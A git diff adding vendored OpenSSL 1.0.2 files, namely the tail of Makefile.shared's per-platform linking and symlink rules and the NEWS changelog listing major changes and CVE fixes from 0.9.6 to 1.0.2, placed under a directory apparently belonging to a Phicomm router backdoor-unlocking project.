+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -Wl,-B,symbolic,+vnocompatwarnings,-z,+s,+h,$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX,+cdp,../:,+cdp,./:"; \
+	fi; \
+	rm -f $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX || :; \
+	$(LINK_SO_A) && chmod a=rx $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX
+link_app.hpux:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_APP); else \
+	LDFLAGS="$(CFLAGS) -Wl,+s,+cdp,../:,+cdp,./:,+b,$(LIBRPATH)"; \
+	fi; \
+	$(LINK_APP)
+
+link_o.aix:
+	@ $(CALC_VERSIONS); \
+	OBJECT_MODE=`expr "x$(SHARED_LDFLAGS)" : 'x\-[a-z]*\(64\)'` || :; \
+	OBJECT_MODE=$${OBJECT_MODE:-32}; export OBJECT_MODE; \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS=''; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS='$(CFLAGS) $(SHARED_LDFLAGS) -Wl,-bexpall,-bnolibpath,-bM:SRE'; \
+	$(LINK_SO_O);
+link_a.aix:
+	@ $(CALC_VERSIONS); \
+	OBJECT_MODE=`expr "x$(SHARED_LDFLAGS)" : 'x\-[a-z]*\(64\)'` || : ; \
+	OBJECT_MODE=$${OBJECT_MODE:-32}; export OBJECT_MODE; \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS='-bnogc'; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS='$(CFLAGS) $(SHARED_LDFLAGS) -Wl,-bexpall,-bnolibpath,-bM:SRE'; \
+	$(LINK_SO_A_VIA_O)
+link_app.aix:
+	LDFLAGS="$(CFLAGS) -Wl,-brtl,-blibpath:$(LIBRPATH):$${LIBPATH:-/usr/lib:/lib}"; \
+	$(LINK_APP)
+
+link_o.reliantunix:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS=; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS='$(CFLAGS) -G'; \
+	$(LINK_SO_O)
+link_a.reliantunix:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS=; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS='$(CFLAGS) -G'; \
+	$(LINK_SO_A_UNPACKED)
+link_app.reliantunix:
+	$(LINK_APP)
+
+# Targets to build symbolic links when needed
+symlink.gnu symlink.solaris symlink.svr3 symlink.svr5 symlink.irix \
+symlink.aix symlink.reliantunix:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	$(SYMLINK_SO)
+symlink.darwin:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME); \
+	SHLIB_SUFFIX=.dylib; \
+	$(SYMLINK_SO)
+symlink.hpux:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).sl; \
+	expr $(PLATFORM) : '.*ia64' > /dev/null && SHLIB=lib$(LIBNAME).so; \
+	$(SYMLINK_SO)
+# The following lines means those specific architectures do no symlinks
+symlink.cygwin symlink.alpha-osf1 symlink.tru64 symlink.tru64-rpath symlink.beos:
+
+# Compatibility targets
+link_o.bsd-gcc-shared link_o.linux-shared link_o.gnu-shared: link_o.gnu
+link_a.bsd-gcc-shared link_a.linux-shared link_a.gnu-shared: link_a.gnu
+link_app.bsd-gcc-shared link_app.linux-shared link_app.gnu-shared: link_app.gnu
+symlink.bsd-gcc-shared symlink.bsd-shared symlink.linux-shared symlink.gnu-shared: symlink.gnu
+link_o.bsd-shared: link_o.bsd
+link_a.bsd-shared: link_a.bsd
+link_app.bsd-shared: link_app.bsd
+link_o.darwin-shared: link_o.darwin
+link_a.darwin-shared: link_a.darwin
+link_app.darwin-shared: link_app.darwin
+symlink.darwin-shared: symlink.darwin
+link_o.cygwin-shared: link_o.cygwin
+link_a.cygwin-shared: link_a.cygwin
+link_app.cygwin-shared: link_app.cygwin
+symlink.cygwin-shared: symlink.cygwin
+link_o.alpha-osf1-shared: link_o.alpha-osf1
+link_a.alpha-osf1-shared: link_a.alpha-osf1
+link_app.alpha-osf1-shared: link_app.alpha-osf1
+symlink.alpha-osf1-shared: symlink.alpha-osf1
+link_o.tru64-shared: link_o.tru64
+link_a.tru64-shared: link_a.tru64
+link_app.tru64-shared: link_app.tru64
+symlink.tru64-shared: symlink.tru64
+link_o.tru64-shared-rpath: link_o.tru64-rpath
+link_a.tru64-shared-rpath: link_a.tru64-rpath
+link_app.tru64-shared-rpath: link_app.tru64-rpath
+symlink.tru64-shared-rpath: symlink.tru64-rpath
+link_o.solaris-shared: link_o.solaris
+link_a.solaris-shared: link_a.solaris
+link_app.solaris-shared: link_app.solaris
+symlink.solaris-shared: symlink.solaris
+link_o.svr3-shared: link_o.svr3
+link_a.svr3-shared: link_a.svr3
+link_app.svr3-shared: link_app.svr3
+symlink.svr3-shared: symlink.svr3
+link_o.svr5-shared: link_o.svr5
+link_a.svr5-shared: link_a.svr5
+link_app.svr5-shared: link_app.svr5
+symlink.svr5-shared: symlink.svr5
+link_o.irix-shared: link_o.irix
+link_a.irix-shared: link_a.irix
+link_app.irix-shared: link_app.irix
+symlink.irix-shared: symlink.irix
+link_o.hpux-shared: link_o.hpux
+link_a.hpux-shared: link_a.hpux
+link_app.hpux-shared: link_app.hpux
+symlink.hpux-shared: symlink.hpux
+link_o.aix-shared: link_o.aix
+link_a.aix-shared: link_a.aix
+link_app.aix-shared: link_app.aix
+symlink.aix-shared: symlink.aix
+link_o.reliantunix-shared: link_o.reliantunix
+link_a.reliantunix-shared: link_a.reliantunix
+link_app.reliantunix-shared: link_app.reliantunix
+symlink.reliantunix-shared: symlink.reliantunix
+link_o.beos-shared: link_o.beos
+link_a.beos-shared: link_a.beos
+link_app.beos-shared: link_app.gnu
+symlink.beos-shared: symlink.beos
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/NEWS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/NEWS
new file mode 100644
index 0000000..35f3e3f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/NEWS
@@ -0,0 +1,770 @@
+
+  NEWS
+  ====
+
+  This file gives a brief overview of the major changes between each OpenSSL
+  release. For more details please read the CHANGES file.
+
+  Major changes between OpenSSL 1.0.1l and OpenSSL 1.0.2 [22 Jan 2015]:
+
+      o Suite B support for TLS 1.2 and DTLS 1.2
+      o Support for DTLS 1.2
+      o TLS automatic EC curve selection.
+      o API to set TLS supported signature algorithms and curves
+      o SSL_CONF configuration API.
+      o TLS Brainpool support.
+      o ALPN support.
+      o CMS support for RSA-PSS, RSA-OAEP, ECDH and X9.42 DH.
+
+  Major changes between OpenSSL 1.0.1k and OpenSSL 1.0.1l [15 Jan 2015]
+
+      o Build fixes for the Windows and OpenVMS platforms
+
+  Major changes between OpenSSL 1.0.1j and OpenSSL 1.0.1k [8 Jan 2015]
+
+      o Fix for CVE-2014-3571
+      o Fix for CVE-2015-0206
+      o Fix for CVE-2014-3569
+      o Fix for CVE-2014-3572
+      o Fix for CVE-2015-0204
+      o Fix for CVE-2015-0205
+      o Fix for CVE-2014-8275
+      o Fix for CVE-2014-3570
+
+  Major changes between OpenSSL 1.0.1i and OpenSSL 1.0.1j [15 Oct 2014]
+
+      o Fix for CVE-2014-3513
+      o Fix for CVE-2014-3567
+      o Mitigation for CVE-2014-3566 (SSL protocol vulnerability)
+      o Fix for CVE-2014-3568
+
+  Major changes between OpenSSL 1.0.1h and OpenSSL 1.0.1i [6 Aug 2014]
+
+      o Fix for CVE-2014-3512
+      o Fix for CVE-2014-3511
+      o Fix for CVE-2014-3510
+      o Fix for CVE-2014-3507
+      o Fix for CVE-2014-3506
+      o Fix for CVE-2014-3505
+      o Fix for CVE-2014-3509
+      o Fix for CVE-2014-5139
+      o Fix for CVE-2014-3508
+
+  Major changes between OpenSSL 1.0.1g and OpenSSL 1.0.1h [5 Jun 2014]
+
+      o Fix for CVE-2014-0224
+      o Fix for CVE-2014-0221
+      o Fix for CVE-2014-0195
+      o Fix for CVE-2014-3470
+      o Fix for CVE-2010-5298
+
+  Major changes between OpenSSL 1.0.1f and OpenSSL 1.0.1g [7 Apr 2014]
+
+      o Fix for CVE-2014-0160
+      o Add TLS padding extension workaround for broken servers.
+      o Fix for CVE-2014-0076
+
+  Major changes between OpenSSL 1.0.1e and OpenSSL 1.0.1f [6 Jan 2014]
+
+      o Don't include gmt_unix_time in TLS server and client random values
+      o Fix for TLS record tampering bug CVE-2013-4353
+      o Fix for TLS version checking bug CVE-2013-6449
+      o Fix for DTLS retransmission bug CVE-2013-6450
+
+  Major changes between OpenSSL 1.0.1d and OpenSSL 1.0.1e [11 Feb 2013]:
+
+      o Corrected fix for CVE-2013-0169
+
+  Major changes between OpenSSL 1.0.1c and OpenSSL 1.0.1d [4 Feb 2013]:
+
+      o Fix renegotiation in TLS 1.1, 1.2 by using the correct TLS version.
+      o Include the fips configuration module.
+      o Fix OCSP bad key DoS attack CVE-2013-0166
+      o Fix for SSL/TLS/DTLS CBC plaintext recovery attack CVE-2013-0169
+      o Fix for TLS AESNI record handling flaw CVE-2012-2686
+
+  Major changes between OpenSSL 1.0.1b and OpenSSL 1.0.1c [10 May 2012]:
+
+      o Fix TLS/DTLS record length checking bug CVE-2012-2333
+      o Don't attempt to use non-FIPS composite ciphers in FIPS mode.
+
+  Major changes between OpenSSL 1.0.1a and OpenSSL 1.0.1b [26 Apr 2012]:
+
+      o Fix compilation error on non-x86 platforms.
+      o Make FIPS capable OpenSSL ciphers work in non-FIPS mode.
+      o Fix SSL_OP_NO_TLSv1_1 clash with SSL_OP_ALL in OpenSSL 1.0.0
+
+  Major changes between OpenSSL 1.0.1 and OpenSSL 1.0.1a [19 Apr 2012]:
+
+      o Fix for ASN1 overflow bug CVE-2012-2110
+      o Workarounds for some servers that hang on long client hellos.
+      o Fix SEGV in AES code.
+
+  Major changes between OpenSSL 1.0.0h and OpenSSL 1.0.1 [14 Mar 2012]:
+
+      o TLS/DTLS heartbeat support.
+      o SCTP support.
+      o RFC 5705 TLS key material exporter.
+      o RFC 5764 DTLS-SRTP negotiation.
+      o Next Protocol Negotiation.
+      o PSS signatures in certificates, requests and CRLs.
+      o Support for password based recipient info for CMS.
+      o Support TLS v1.2 and TLS v1.1.
+      o Preliminary FIPS capability for unvalidated 2.0 FIPS module.
+      o SRP support.
+
+  Major changes between OpenSSL 1.0.0j and OpenSSL 1.0.0k [5 Feb 2013]:
+
+      o Fix for SSL/TLS/DTLS CBC plaintext recovery attack CVE-2013-0169
+      o Fix OCSP bad key DoS attack CVE-2013-0166
+
+  Major changes between OpenSSL 1.0.0i and OpenSSL 1.0.0j [10 May 2012]:
+
+      o Fix DTLS record length checking bug CVE-2012-2333
+
+  Major changes between OpenSSL 1.0.0h and OpenSSL 1.0.0i [19 Apr 2012]:
+
+      o Fix for ASN1 overflow bug CVE-2012-2110
+
+  Major changes between OpenSSL 1.0.0g and OpenSSL 1.0.0h [12 Mar 2012]:
+
+      o Fix for CMS/PKCS#7 MMA CVE-2012-0884
+      o Corrected fix for CVE-2011-4619
+      o Various DTLS fixes.
+
+  Major changes between OpenSSL 1.0.0f and OpenSSL 1.0.0g [18 Jan 2012]:
+
+      o Fix for DTLS DoS issue CVE-2012-0050
+
+  Major changes between OpenSSL 1.0.0e and OpenSSL 1.0.0f [4 Jan 2012]:
+
+      o Fix for DTLS plaintext recovery attack CVE-2011-4108
+      o Clear block padding bytes of SSL 3.0 records CVE-2011-4576
+      o Only allow one SGC handshake restart for SSL/TLS CVE-2011-4619
+      o Check parameters are not NULL in GOST ENGINE CVE-2012-0027
+      o Check for malformed RFC3779 data CVE-2011-4577
+
+  Major changes between OpenSSL 1.0.0d and OpenSSL 1.0.0e [6 Sep 2011]:
+
+      o Fix for CRL vulnerability issue CVE-2011-3207
+      o Fix for ECDH crashes CVE-2011-3210
+      o Protection against EC timing attacks.
+      o Support ECDH ciphersuites for certificates using SHA2 algorithms.
+      o Various DTLS fixes.
+
+  Major changes between OpenSSL 1.0.0c and OpenSSL 1.0.0d [8 Feb 2011]:
+
+      o Fix for security issue CVE-2011-0014
+
+  Major changes between OpenSSL 1.0.0b and OpenSSL 1.0.0c [2 Dec 2010]:
+
+      o Fix for security issue CVE-2010-4180
+      o Fix for CVE-2010-4252
+      o Fix mishandling of absent EC point format extension.
+      o Fix various platform compilation issues.
+      o Corrected fix for security issue CVE-2010-3864.
+
+  Major changes between OpenSSL 1.0.0a and OpenSSL 1.0.0b [16 Nov 2010]:
+
+      o Fix for security issue CVE-2010-3864.
+      o Fix for CVE-2010-2939
+      o Fix WIN32 build system for GOST ENGINE.
+
+  Major changes between OpenSSL 1.0.0 and OpenSSL 1.0.0a [1 Jun 2010]:
+
+      o Fix for security issue CVE-2010-1633.
+      o GOST MAC and CFB fixes.
+
+  Major changes between OpenSSL 0.9.8n and OpenSSL 1.0.0 [29 Mar 2010]:
+
+      o RFC3280 path validation: sufficient to process PKITS tests.
+      o Integrated support for PVK files and keyblobs.
+      o Change default private key format to PKCS#8.
+      o CMS support: able to process all examples in RFC4134
+      o Streaming ASN1 encode support for PKCS#7 and CMS.
+      o Multiple signer and signer add support for PKCS#7 and CMS.
+      o ASN1 printing support.
+      o Whirlpool hash algorithm added.
+      o RFC3161 time stamp support.
+      o New generalised public key API supporting ENGINE based algorithms.
+      o New generalised public key API utilities.
+      o New ENGINE supporting GOST algorithms.
+      o SSL/TLS GOST ciphersuite support.
+      o PKCS#7 and CMS GOST support.
+      o RFC4279 PSK ciphersuite support.
+      o Supported points format extension for ECC ciphersuites.
+      o ecdsa-with-SHA224/256/384/512 signature types.
+      o dsa-with-SHA224 and dsa-with-SHA256 signature types.
+      o Opaque PRF Input TLS extension support.
+      o Updated time routines to avoid OS limitations.
+
+  Major changes between OpenSSL 0.9.8x and OpenSSL 0.9.8y [5 Feb 2013]:
+
+      o Fix for SSL/TLS/DTLS CBC plaintext recovery attack CVE-2013-0169
+      o Fix OCSP bad key DoS attack CVE-2013-0166
+
+  Major changes between OpenSSL 0.9.8w and OpenSSL 0.9.8x [10 May 2012]:
+
+      o Fix DTLS record length checking bug CVE-2012-2333
+
+  Major changes between OpenSSL 0.9.8v and OpenSSL 0.9.8w [23 Apr 2012]:
+
+      o Fix for CVE-2012-2131 (corrected fix for 0.9.8 and CVE-2012-2110)
+
+  Major changes between OpenSSL 0.9.8u and OpenSSL 0.9.8v [19 Apr 2012]:
+
+      o Fix for ASN1 overflow bug CVE-2012-2110
+
+  Major changes between OpenSSL 0.9.8t and OpenSSL 0.9.8u [12 Mar 2012]:
+
+      o Fix for CMS/PKCS#7 MMA CVE-2012-0884
+      o Corrected fix for CVE-2011-4619
+      o Various DTLS fixes.
+
+  Major changes between OpenSSL 0.9.8s and OpenSSL 0.9.8t [18 Jan 2012]:
+
+      o Fix for DTLS DoS issue CVE-2012-0050
+
+  Major changes between OpenSSL 0.9.8r and OpenSSL 0.9.8s [4 Jan 2012]:
+
+      o Fix for DTLS plaintext recovery attack CVE-2011-4108
+      o Fix policy check double free error CVE-2011-4109
+      o Clear block padding bytes of SSL 3.0 records CVE-2011-4576
+      o Only allow one SGC handshake restart for SSL/TLS CVE-2011-4619
+      o Check for malformed RFC3779 data CVE-2011-4577
+
+  Major changes between OpenSSL 0.9.8q and OpenSSL 0.9.8r [8 Feb 2011]:
+
+      o Fix for security issue CVE-2011-0014
+
+  Major changes between OpenSSL 0.9.8p and OpenSSL 0.9.8q [2 Dec 2010]:
+
+      o Fix for security issue CVE-2010-4180
+      o Fix for CVE-2010-4252
+
+  Major changes between OpenSSL 0.9.8o and OpenSSL 0.9.8p [16 Nov 2010]:
+
+      o Fix for security issue CVE-2010-3864.
+
+  Major changes between OpenSSL 0.9.8n and OpenSSL 0.9.8o [1 Jun 2010]:
+
+      o Fix for security issue CVE-2010-0742.
+      o Various DTLS fixes.
+      o Recognise SHA2 certificates if only SSL algorithms added.
+      o Fix for no-rc4 compilation.
+      o Chil ENGINE unload workaround.
+
+  Major changes between OpenSSL 0.9.8m and OpenSSL 0.9.8n [24 Mar 2010]:
+
+      o CFB cipher definition fixes.
+      o Fix security issues CVE-2010-0740 and CVE-2010-0433.
+
+  Major changes between OpenSSL 0.9.8l and OpenSSL 0.9.8m [25 Feb 2010]:
+
+      o Cipher definition fixes.
+      o Workaround for slow RAND_poll() on some WIN32 versions.
+      o Remove MD2 from algorithm tables.
+      o SPKAC handling fixes.
+      o Support for RFC5746 TLS renegotiation extension.
+      o Compression memory leak fixed.
+      o Compression session resumption fixed.
+      o Ticket and SNI coexistence fixes.
+      o Many fixes to DTLS handling. 
+
+  Major changes between OpenSSL 0.9.8k and OpenSSL 0.9.8l [5 Nov 2009]:
+
+      o Temporary work around for CVE-2009-3555: disable renegotiation.
+
+  Major changes between OpenSSL 0.9.8j and OpenSSL 0.9.8k [25 Mar 2009]:
+
+      o Fix various build issues.
+      o Fix security issues (CVE-2009-0590, CVE-2009-0591, CVE-2009-0789)
+
+  Major changes between OpenSSL 0.9.8i and OpenSSL 0.9.8j [7 Jan 2009]:
+
+      o Fix security issue (CVE-2008-5077)
+      o Merge FIPS 140-2 branch code.
+
+  Major changes between OpenSSL 0.9.8g and OpenSSL 0.9.8h [28 May 2008]:
+
+      o CryptoAPI ENGINE support.
+      o Various precautionary measures.
+      o Fix for bugs affecting certificate request creation.
+      o Support for local machine keyset attribute in PKCS#12 files.
+
+  Major changes between OpenSSL 0.9.8f and OpenSSL 0.9.8g [19 Oct 2007]:
+
+      o Backport of CMS functionality to 0.9.8.
+      o Fixes for bugs introduced with 0.9.8f.
+
+  Major changes between OpenSSL 0.9.8e and OpenSSL 0.9.8f [11 Oct 2007]:
+
+      o Add gcc 4.2 support.
+      o Add support for AES and SSE2 assembly lanugauge optimization
+        for VC++ build.
+      o Support for RFC4507bis and server name extensions if explicitly 
+        selected at compile time.
+      o DTLS improvements.
+      o RFC4507bis support.
+      o TLS Extensions support.
+
+  Major changes between OpenSSL 0.9.8d and OpenSSL 0.9.8e [23 Feb 2007]:
+
+      o Various ciphersuite selection fixes.
+      o RFC3779 support.
+
+  Major changes between OpenSSL 0.9.8c and OpenSSL 0.9.8d [28 Sep 2006]:
+
+      o Introduce limits to prevent malicious key DoS  (CVE-2006-2940)
+      o Fix security issues (CVE-2006-2937, CVE-2006-3737, CVE-2006-4343)
+      o Changes to ciphersuite selection algorithm
+
+  Major changes between OpenSSL 0.9.8b and OpenSSL 0.9.8c [5 Sep 2006]:
+
+      o Fix Daniel Bleichenbacher forged signature attack, CVE-2006-4339
+      o New cipher Camellia
+
+  Major changes between OpenSSL 0.9.8a and OpenSSL 0.9.8b [4 May 2006]:
+
+      o Cipher string fixes.
+      o Fixes for VC++ 2005.
+      o Updated ECC cipher suite support.
+      o New functions EVP_CIPHER_CTX_new() and EVP_CIPHER_CTX_free().
+      o Zlib compression usage fixes.
+      o Built in dynamic engine compilation support on Win32.
+      o Fixes auto dynamic engine loading in Win32.
+
+  Major changes between OpenSSL 0.9.8 and OpenSSL 0.9.8a [11 Oct 2005]:
+
+      o Fix potential SSL 2.0 rollback, CVE-2005-2969
+      o Extended Windows CE support
+
+  Major changes between OpenSSL 0.9.7g and OpenSSL 0.9.8 [5 Jul 2005]:
+
+      o Major work on the BIGNUM library for higher efficiency and to
+        make operations more streamlined and less contradictory.  This
+        is the result of a major audit of the BIGNUM library.
+      o Addition of BIGNUM functions for fields GF(2^m) and NIST
+        curves, to support the Elliptic Crypto functions.
+      o Major work on Elliptic Crypto; ECDH and ECDSA added, including
+        the use through EVP, X509 and ENGINE.
+      o New ASN.1 mini-compiler that's usable through the OpenSSL
+        configuration file.
+      o Added support for ASN.1 indefinite length constructed encoding.
+      o New PKCS#12 'medium level' API to manipulate PKCS#12 files.
+      o Complete rework of shared library construction and linking
+        programs with shared or static libraries, through a separate
+        Makefile.shared.
+      o Rework of the passing of parameters from one Makefile to another.
+      o Changed ENGINE framework to load dynamic engine modules
+        automatically from specifically given directories.
+      o New structure and ASN.1 functions for CertificatePair.
+      o Changed the ZLIB compression method to be stateful.
+      o Changed the key-generation and primality testing "progress"
+        mechanism to take a structure that contains the ticker
+        function and an argument.
+      o New engine module: GMP (performs private key exponentiation).
+      o New engine module: VIA PadLOck ACE extension in VIA C3
+        Nehemiah processors.
+      o Added support for IPv6 addresses in certificate extensions.
+        See RFC 1884, section 2.2.
+      o Added support for certificate policy mappings, policy
+        constraints and name constraints.
+      o Added support for multi-valued AVAs in the OpenSSL
+        configuration file.
+      o Added support for multiple certificates with the same subject
+        in the 'openssl ca' index file.
+      o Make it possible to create self-signed certificates using
+        'openssl ca -selfsign'.
+      o Make it possible to generate a serial number file with
+        'openssl ca -create_serial'.
+      o New binary search functions with extended functionality.
+      o New BUF functions.
+      o New STORE structure and library to provide an interface to all
+        sorts of data repositories.  Supports storage of public and
+        private keys, certificates, CRLs, numbers and arbitrary blobs.
+	This library is unfortunately unfinished and unused withing
+	OpenSSL.
+      o New control functions for the error stack.
+      o Changed the PKCS#7 library to support one-pass S/MIME
+        processing.
+      o Added the possibility to compile without old deprecated
+        functionality with the OPENSSL_NO_DEPRECATED macro or the
+        'no-deprecated' argument to the config and Configure scripts.
+      o Constification of all ASN.1 conversion functions, and other
+        affected functions.
+      o Improved platform support for PowerPC.
+      o New FIPS 180-2 algorithms (SHA-224, -256, -384 and -512).
+      o New X509_VERIFY_PARAM structure to support parametrisation
+        of X.509 path validation.
+      o Major overhaul of RC4 performance on Intel P4, IA-64 and
+        AMD64.
+      o Changed the Configure script to have some algorithms disabled
+        by default.  Those can be explicitely enabled with the new
+        argument form 'enable-xxx'.
+      o Change the default digest in 'openssl' commands from MD5 to
+        SHA-1.
+      o Added support for DTLS.
+      o New BIGNUM blinding.
+      o Added support for the RSA-PSS encryption scheme
+      o Added support for the RSA X.931 padding.
+      o Added support for BSD sockets on NetWare.
+      o Added support for files larger than 2GB.
+      o Added initial support for Win64.
+      o Added alternate pkg-config files.
+
+  Major changes between OpenSSL 0.9.7l and OpenSSL 0.9.7m [23 Feb 2007]:
+
+      o FIPS 1.1.1 module linking.
+      o Various ciphersuite selection fixes.
+
+  Major changes between OpenSSL 0.9.7k and OpenSSL 0.9.7l [28 Sep 2006]:
+
+      o Introduce limits to prevent malicious key DoS  (CVE-2006-2940)
+      o Fix security issues (CVE-2006-2937, CVE-2006-3737, CVE-2006-4343)
+
+  Major changes between OpenSSL 0.9.7j and OpenSSL 0.9.7k [5 Sep 2006]:
+
+      o Fix Daniel Bleichenbacher forged signature attack, CVE-2006-4339
+
+  Major changes between OpenSSL 0.9.7i and OpenSSL 0.9.7j [4 May 2006]:
+
+      o Visual C++ 2005 fixes.
+      o Update Windows build system for FIPS.
+
+  Major changes between OpenSSL 0.9.7h and OpenSSL 0.9.7i [14 Oct 2005]:
+
+      o Give EVP_MAX_MD_SIZE it's old value, except for a FIPS build.
+
+  Major changes between OpenSSL 0.9.7g and OpenSSL 0.9.7h [11 Oct 2005]:
+
+      o Fix SSL 2.0 Rollback, CVE-2005-2969
+      o Allow use of fixed-length exponent on DSA signing
+      o Default fixed-window RSA, DSA, DH private-key operations
+
+  Major changes between OpenSSL 0.9.7f and OpenSSL 0.9.7g [11 Apr 2005]:
+
+      o More compilation issues fixed.
+      o Adaptation to more modern Kerberos API.
+      o Enhanced or corrected configuration for Solaris64, Mingw and Cygwin.
+      o Enhanced x86_64 assembler BIGNUM module.
+      o More constification.
+      o Added processing of proxy certificates (RFC 3820).
+
+  Major changes between OpenSSL 0.9.7e and OpenSSL 0.9.7f [22 Mar 2005]:
+
+      o Several compilation issues fixed.
+      o Many memory allocation failure checks added.
+      o Improved comparison of X509 Name type.
+      o Mandatory basic checks on certificates.
+      o Performance improvements.
+
+  Major changes between OpenSSL 0.9.7d and OpenSSL 0.9.7e [25 Oct 2004]:
+
+      o Fix race condition in CRL checking code.
+      o Fixes to PKCS#7 (S/MIME) code.
+
+  Major changes between OpenSSL 0.9.7c and OpenSSL 0.9.7d [17 Mar 2004]:
+
+      o Security: Fix Kerberos ciphersuite SSL/TLS handshaking bug
+      o Security: Fix null-pointer assignment in do_change_cipher_spec()
+      o Allow multiple active certificates with same subject in CA index
+      o Multiple X509 verification fixes
+      o Speed up HMAC and other operations
+
+  Major changes between OpenSSL 0.9.7b and OpenSSL 0.9.7c [30 Sep 2003]:
+
+      o Security: fix various ASN1 parsing bugs.
+      o New -ignore_err option to OCSP utility.
+      o Various interop and bug fixes in S/MIME code.
+      o SSL/TLS protocol fix for unrequested client certificates.
+
+  Major changes between OpenSSL 0.9.7a and OpenSSL 0.9.7b [10 Apr 2003]:
+
+      o Security: counter the Klima-Pokorny-Rosa extension of
+        Bleichbacher's attack 
+      o Security: make RSA blinding default.
+      o Configuration: Irix fixes, AIX fixes, better mingw support.
+      o Support for new platforms: linux-ia64-ecc.
+      o Build: shared library support fixes.
+      o ASN.1: treat domainComponent correctly.
+      o Documentation: fixes and additions.
+
+  Major changes between OpenSSL 0.9.7 and OpenSSL 0.9.7a [19 Feb 2003]:
+
+      o Security: Important security related bugfixes.
+      o Enhanced compatibility with MIT Kerberos.
+      o Can be built without the ENGINE framework.
+      o IA32 assembler enhancements.
+      o Support for new platforms: FreeBSD/IA64 and FreeBSD/Sparc64.
+      o Configuration: the no-err option now works properly.
+      o SSL/TLS: now handles manual certificate chain building.
+      o SSL/TLS: certain session ID malfunctions corrected.
+
+  Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.7 [30 Dec 2002]:
+
+      o New library section OCSP.
+      o Complete rewrite of ASN1 code.
+      o CRL checking in verify code and openssl utility.
+      o Extension copying in 'ca' utility.
+      o Flexible display options in 'ca' utility.
+      o Provisional support for international characters with UTF8.
+      o Support for external crypto devices ('engine') is no longer
+        a separate distribution.
+      o New elliptic curve library section.
+      o New AES (Rijndael) library section.
+      o Support for new platforms: Windows CE, Tandem OSS, A/UX, AIX 64-bit,
+        Linux x86_64, Linux 64-bit on Sparc v9
+      o Extended support for some platforms: VxWorks
+      o Enhanced support for shared libraries.
+      o Now only builds PIC code when shared library support is requested.
+      o Support for pkg-config.
+      o Lots of new manuals.
+      o Makes symbolic links to or copies of manuals to cover all described
+        functions.
+      o Change DES API to clean up the namespace (some applications link also
+        against libdes providing similar functions having the same name).
+        Provide macros for backward compatibility (will be removed in the
+        future).
+      o Unify handling of cryptographic algorithms (software and engine)
+        to be available via EVP routines for asymmetric and symmetric ciphers.
+      o NCONF: new configuration handling routines.
+      o Change API to use more 'const' modifiers to improve error checking
+        and help optimizers.
+      o Finally remove references to RSAref.
+      o Reworked parts of the BIGNUM code.
+      o Support for new engines: Broadcom ubsec, Accelerated Encryption
+        Processing, IBM 4758.
+      o A few new engines added in the demos area.
+      o Extended and corrected OID (object identifier) table.
+      o PRNG: query at more locations for a random device, automatic query for
+        EGD style random sources at several locations.
+      o SSL/TLS: allow optional cipher choice according to server's preference.
+      o SSL/TLS: allow server to explicitly set new session ids.
+      o SSL/TLS: support Kerberos cipher suites (RFC2712).
+	Only supports MIT Kerberos for now.
+      o SSL/TLS: allow more precise control of renegotiations and sessions.
+      o SSL/TLS: add callback to retrieve SSL/TLS messages.
+      o SSL/TLS: support AES cipher suites (RFC3268).
+
+  Major changes between OpenSSL 0.9.6j and OpenSSL 0.9.6k [30 Sep 2003]:
+
+      o Security: fix various ASN1 parsing bugs.
+      o SSL/TLS protocol fix for unrequested client certificates.
+
+  Major changes between OpenSSL 0.9.6i and OpenSSL 0.9.6j [10 Apr 2003]:
+
+      o Security: counter the Klima-Pokorny-Rosa extension of
+        Bleichbacher's attack 
+      o Security: make RSA blinding default.
+      o Build: shared library support fixes.
+
+  Major changes between OpenSSL 0.9.6h and OpenSSL 0.9.6i [19 Feb 2003]:
+
+      o Important security related bugfixes.
+
+  Major changes between OpenSSL 0.9.6g and OpenSSL 0.9.6h [5 Dec 2002]:
+
+      o New configuration targets for Tandem OSS and A/UX.
+      o New OIDs for Microsoft attributes.
+      o Better handling of SSL session caching.
+      o Better comparison of distinguished names.
+      o Better handling of shared libraries in a mixed GNU/non-GNU environment.
+      o Support assembler code with Borland C.
+      o Fixes for length problems.
+      o Fixes for uninitialised variables.
+      o Fixes for memory leaks, some unusual crashes and some race conditions.
+      o Fixes for smaller building problems.
+      o Updates of manuals, FAQ and other instructive documents.
+
+  Major changes between OpenSSL 0.9.6f and OpenSSL 0.9.6g [9 Aug 2002]:
+
+      o Important building fixes on Unix.
+
+  Major changes between OpenSSL 0.9.6e and OpenSSL 0.9.6f [8 Aug 2002]:
+
+      o Various important bugfixes.
+
+  Major changes between OpenSSL 0.9.6d and OpenSSL 0.9.6e [30 Jul 2002]:
+
+      o Important security related bugfixes.
+      o Various SSL/TLS library bugfixes.
+
+  Major changes between OpenSSL 0.9.6c and OpenSSL 0.9.6d [9 May 2002]:
+
+      o Various SSL/TLS library bugfixes.
+      o Fix DH parameter generation for 'non-standard' generators.
+
+  Major changes between OpenSSL 0.9.6b and OpenSSL 0.9.6c [21 Dec 2001]:
+
+      o Various SSL/TLS library bugfixes.
+      o BIGNUM library fixes.
+      o RSA OAEP and random number generation fixes.
+      o Object identifiers corrected and added.
+      o Add assembler BN routines for IA64.
